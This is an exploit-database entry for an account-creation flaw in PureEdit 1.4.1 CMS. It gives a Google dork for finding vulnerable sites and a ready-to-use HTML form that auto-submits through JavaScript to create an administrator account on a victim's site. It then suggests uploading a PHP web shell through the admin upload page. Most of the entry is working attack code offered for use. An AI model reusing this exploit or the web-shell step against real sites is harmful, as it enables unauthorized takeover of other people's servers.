PureEdit 1.4.1 Account Creation Vulnerability

2010-08-23T00:00:00
ID 1337DAY-ID-13793
Type zdt
Reporter pimpim
Modified 2010-08-23T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =============================================
PureEdit 1.4.1 Account Creation Vulnerability
=============================================

# Exploit Title: PureEdit 1.4.1 Account Creation Vulnerability
# Date: 22/08/2010
# Author: pimpim
# Software Link: http://www.pureedit.com/download/index.php?version=1.4.1
# Version: 1.4.1
# Category:: webapps
# Google dork: intext:"Powered by PureEdit"
# Tested on: Linux
#
#The PureEdit CMS has got a design flaw that allows anybody to create admin accounts.
#Note: The default admin directory is called pe-admin
#Note2: When you have created your account, then you can go to 
#[admin]/centers/uploads.center.php and upload a php-shell

<html>
	<body>
		<form action="http://[victim]/[admin-directory]/centers/accounts.center.php" method="POST">
			<input type="hidden" name="id" value="0"/>
			<input type="hidden" name="title" value="hack"/>
			<input type="hidden" name="email" value="[email protected]"/>
			<input type="hidden" name="website" value="http://www.inj3ct0r.com"/>
			<input type="hidden" name="username" value="hacker"/>
			<input type="hidden" name="password" value="passwd"/>
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>



#  0day.today [2018-04-13]  #